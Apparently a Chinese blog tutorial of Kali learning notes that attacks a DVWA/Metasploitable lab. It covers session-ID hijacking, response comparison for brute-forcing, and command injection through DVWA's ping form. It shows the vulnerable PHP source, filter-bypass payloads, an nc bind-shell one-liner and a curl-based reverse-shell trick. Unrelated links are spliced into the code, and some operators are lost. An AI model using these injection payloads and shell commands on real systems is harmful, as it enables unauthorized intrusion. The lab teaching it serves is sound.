一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞

简介: 一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞

文章的格式也许不是很好看,也没有什么合理的顺序

完全是想到什么写一些什么,但各个方面都涵盖到了

能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道

实验环境:

Kali机器:192.168.163.132

Metasploitable靶机:192.168.163.129

首先我们要尝试身份认证(登陆):

就拿DVWA来测试

启动Burpsuite,访问DVWA:

假设我们现在不知道这里的用户名和密码是多少:

现在我先把密码故意输错:

发现DVWA只是告诉我登陆失败,却并没有告诉我哪里失败,为什么会失败

说明DVWA在身份认证方面还做得不错,如果是一些没有安全意识的程序猿,可能会返回密码错误的界面

然后我们输入正确的密码,用Burp进行比较:

发现返回的结果除了重定向页面和时间基本一致:说明DVWA做的比较好

如果正确和失败返回的结果有不同之处,那么我们就可以利用这里的漏洞来爆破

但是,如果我们想尽办法还是登陆不上去呢?

这时候可以想象Cookie方面有没有可以利用的?

如何获取SessionID:

第一种:XSS,这种后面具体介绍

第二种:通过Get或者Post传递的SessionID

做得不好的Web应用,有可能直接把SessionID放在URL上,利用社会工程学获取后直接就可以利用

稍微有点安全意识的程序猿,会把SessionID利用POST提交,利用嗅探还是可以获取:

示例:

我用Windows机器作为正常的管理员登陆Metasploitable:

登陆之后,我查看到Cookie里面的SessionID:

这里是做演示的,具体的如何获取SessionID我会在后边的过程进行演示

然后我就可以用这里的Cookie使Kali机器直接以Windows机器的身份来登陆

可以利用Kali的Firefox的Cookie Manager插件进行Cookie编辑:

当然也可以复制出来SessionID,然后我把它组装好

让Kali使用Burp发送

同时:我们需要更仔细地关注SessionID,它的有效时间,规律等

比如:

点击logout后,sessionID是否会消失

关闭浏览器,sessionID是永久小时还是只改变了状态

然而SessionID其实本质是算法生成的,那么我们就可以使用Burp的Sequence模块来测试

我前面的文章就有提到过,然后就可以针对来生成下一个SessionID,从而做很多的事情

下面,假设我们已经登陆进入了目标:

接下来就可以用我前面文章中写到的一些自动化扫描工具进行Web漏洞扫描

或者继续进行手动挖掘:

下面来看第二种漏洞:

命令执行:

我先把DVWA的安全性调到最低

这里有一个应用:输入一个IP地址,Ping目标,返回结果

我先演示下这里的漏洞,下面具体说:

我尝试输入ls命令:没有反应

那么ls加入分号呢?

结果执行了ls命令

我用Burp来对比两次的请求:

发送请求的时候对分号进行了URL编码

那么,我们如何去发现命令执行漏洞呢?

首先,我们要了解很多的常见漏洞类型

当有一个可以提交数据的表单时候,就要联想到是否有可能发现能够利用的漏洞?

就比如说是这里:

调用操作系统Ping命令而且要返回值,我想到如果用PHP实现比较复杂

那么有可能是目标直接条用系统命令吗?如果是偷懒的程序猿有可能会直接来调用系统命令

首先我输入正常的IP,看看结果:

返回值竟然和系统直接Ping命令格式一致

于是我更进一步可以确认,这里很有可能有命令执行漏洞

首先尝试直接ls命令,上边尝试了,但是没有结果

那我为什么后边又加入了;呢?

然后结合Linux系统的知识:如果想一次执行多条命令,可以使用;或者|

于是,我考虑加入“;”之后再输入命令:果然

实际中如果发现了这种漏洞,就可以用Burp发送提权命令等等

查看源码:

<?php

if( isset( $_POST【 'submit' 】 ) ) {

$target = $_REQUEST【 'ip' 】;

// Determine OS and execute the ping command.

if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );

echo '

'.$cmd.'';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );

echo '

'.$cmd.'';

}

}

?>

简单分析:获取的变量直接给Target复制,然后执行系统命令,存在漏洞

接下来把DVWA的安全性调到中:

这时候如果输入;ls或者符号时候,并不会执行系统命令

查看源码:

<?php

if( isset( $_POST【 'submit'】 ) ) {

$target = $_REQUEST【 'ip' 】;

// Remove any of the charactars in the array (blacklist).

$substitutions = array(

'' => '',

';' => '',

);

$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.

if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );

echo '

'.$cmd.'';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );

echo '

'.$cmd.'';

}

}

?>

仔细观察后发现原来是把“;”和“”特殊符号都变成空字符了(表示前一个命令执行成功后执行后一个命令)

然而对吗漏掉了|这个符号,如果输入|ls还是可以的

或者使用一个,Linux中使用一个代表两条命令一起执行:

127.0.0.1 ls

或者使用两个|,即||,也可以作到,不过需要前一个命令执行失败,再执行后一个命令:

那么将DVWA高安全级别呢?

尝试了各种各样的字符后发现还是没有漏洞

查看源码:

<?php

if( isset( $_POST【 'submit' 】 ) ) {

$target = $_REQUEST【"ip"】;

$target = stripslashes( $target );

// Split the IP into 4 octects

$octet = explode(".", $target);

// Check IF each octet is an integer

if ((is_numeric($octet【0】)) (is_numeric($octet【1】)) (is_numeric($octet【2】)) (is_numeric($octet【3】)) (sizeof($octet) == 4) ) {

// If all 4 octets are int's put the IP back together.

$target = $octet【0】.'.'.$octet【1】.'.'.$octet【2】.'.'.$octet【3】;

// Determine OS and execute the ping command.

if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );

echo '

'.$cmd.'';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );

echo '

'.$cmd.'';

}

}//代码效果参考:http://www.ezhiqi.com/bx/art_6751.html

else {

echo '

ERROR: You have entered an invalid IP';

}

}//代码效果参考:http://www.ezhiqi.com/bx/art_7253.html

?>

它这里是如何判断的呢?

收到的数据然后进行拆分,拆分后四个部分如果是数字,再进行组合,生成一个IP

就算了系统命令用.来分割,但是由于不是数字,不会重组

所以调整到高安全级别基本就是安全的一个应用了

回到刚才在低安全级别下的状态:

我已经找到这里有命令执行的漏洞了

那么怎么做进一步的操作呢?

比如:开启

mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe

输入后使用nc连接:得到shell

但是注意:这里获得的权限不是root

最后看一个有趣的现象:

本意:

把Kali系统的反连Shell脚本复制到Apache服务器,重命名为1.php,是目标访问1.php从而获得shell

对反连shell进行编辑:设置号反连的IP,比如这里我设置的是Kali机器

然后启动Apache服务:

这时候命令执行的表单填写内容:

;curl

提交前nc监听端口,点击按钮,然后获取shell:

结果我仔细观察后发现获取的是我Kali本机的shell!!

原因:

1.php本质是存在于Kali机器的,所以访问1.php就会让Kali机器把shell发出,再让本机收到shell

上一篇中我把1.php的内容复制出来,用Burp发送出去,1.php的内容是在目标机器上执行的,与这种情况不一样

所以要注意:

反连shell脚本在哪个机器就会反弹哪个机器的shell

相关文章
|
1月前
|
算法 网络协议 网络安全
Kali渗透测试:身份认证攻击
Kali渗透测试:身份认证攻击
|
安全 Java API
Shiro 身份认证绕过漏洞 CVE-2022-32532
Apache Shiro 是一个强大且易用的 Java 安全框架,通过它可以执行身份验证、授权、密码和会话管理。使用 Shiro 的易用 API,您可以快速、轻松地保护任何应用程序 —— 从最小的移动应用程序到最大的 WEB 和企业应用程序。
458 0
Shiro 身份认证绕过漏洞 CVE-2022-32532
|
安全 数据安全/隐私保护
靶机实战-密码重置与身份认证失效漏洞
靶机实战-密码重置与身份认证失效漏洞
靶机实战-密码重置与身份认证失效漏洞
|
安全 前端开发 中间件
【bp靶场portswigger-服务端2】身份认证漏洞-16个实验(全)(下)
【bp靶场portswigger-服务端2】身份认证漏洞-16个实验(全)(下)
473 0
【bp靶场portswigger-服务端2】身份认证漏洞-16个实验(全)(下)
|
JSON 安全 Oracle
【bp靶场portswigger-服务端2】身份认证漏洞-16个实验(全)(上)
【bp靶场portswigger-服务端2】身份认证漏洞-16个实验(全)(上)
552 0
【bp靶场portswigger-服务端2】身份认证漏洞-16个实验(全)(上)
|
安全 Ruby
Github Enterprise版本SAML服务两个身份认证漏洞
本文讲的是Github Enterprise版本SAML服务两个身份认证漏洞,在Github Enterprise版本的SAML服务中发现完全身份验证绕过的两个漏洞。作者将这些漏洞通过hackone的漏洞悬赏报告给Github并且已经修复。
2035 0
|
28天前
|
安全 Java 测试技术
ToB项目身份认证AD集成(二):快速搞定window server 2003部署AD域服务并支持ssl
本文详细介绍了如何搭建本地AD域控测试环境,包括安装AD域服务、测试LDAP接口及配置LDAPS的过程。通过运行自签名证书生成脚本和手动部署证书,实现安全的SSL连接,适用于ToB项目的身份认证集成。文中还提供了相关系列文章链接,便于读者深入了解AD和LDAP的基础知识。
|
6月前
|
关系型数据库 MySQL 数据库
云计算|OpenStack|社区版OpenStack安装部署文档(三 --- 身份认证服务keystone安装部署---Rocky版)
云计算|OpenStack|社区版OpenStack安装部署文档(三 --- 身份认证服务keystone安装部署---Rocky版)
170 0